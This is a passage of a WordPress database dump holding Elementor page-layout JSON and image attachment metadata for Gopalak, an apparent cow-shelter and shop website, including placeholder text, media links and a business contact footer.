k Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9161,1575,'_elementor_page_assets','a:0:{}'),(9162,1576,'_elementor_edit_mode','builder'),(9163,1576,'_elementor_template_type','wp-page'),(9164,1576,'_elementor_version','3.7.8'),(9165,1576,'_wp_page_template','elementor_canvas'),(9166,1576,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9167,1576,'_elementor_page_assets','a:0:{}'),(9169,1373,'_oembed_68ba4e2c03b562c5ae244051566a232e','{{unknown}}'),(9170,1577,'_wp_attached_file','2022/10/GOPALAK55.png'),(9171,1577,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:5052;s:6:\"height\";i:1664;s:4:\"file\";s:21:\"2022/10/GOPALAK55.png\";s:8:\"filesize\";i:2987381;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"GOPALAK55-300x99.png\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40132;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"GOPALAK55-1024x337.png\";s:5:\"width\";i:1024;s:6:\"height\";i:337;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:342958;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"GOPALAK55-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23128;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"GOPALAK55-768x253.png\";s:5:\"width\";i:768;s:6:\"height\";i:253;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:206709;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"GOPALAK55-1536x506.png\";s:5:\"width\";i:1536;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:696334;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"GOPALAK55-2048x675.png\";s:5:\"width\";i:2048;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1137569;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"GOPALAK55-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:81493;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"GOPALAK55-50x16.png\";s:5:\"width\";i:50;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1777;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"GOPALAK55-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11698;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:19:\"GOPALAK55-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1699;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:19:\"GOPALAK55-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1699;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9182,1579,'_wp_attached_file','2022/10/GOPALAK555.png'),(9183,1579,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:5052;s:6:\"height\";i:1664;s:4:\"file\";s:22:\"2022/10/GOPALAK555.png\";s:8:\"filesize\";i:2900848;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"GOPALAK555-300x99.png\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33719;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"GOPALAK555-1024x337.png\";s:5:\"width\";i:1024;s:6:\"height\";i:337;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:310602;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"GOPALAK555-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20527;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"GOPALAK555-768x253.png\";s:5:\"width\";i:768;s:6:\"height\";i:253;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:184481;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"GOPALAK555-1536x506.png\";s:5:\"width\";i:1536;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:642998;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:23:\"GOPALAK555-2048x675.png\";s:5:\"width\";i:2048;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1060740;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"GOPALAK555-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:74663;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"GOPALAK555-50x16.png\";s:5:\"width\";i:50;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1386;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"GOPALAK555-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10281;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:20:\"GOPALAK555-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1337;}s:16:\"taiowc-thumb-img\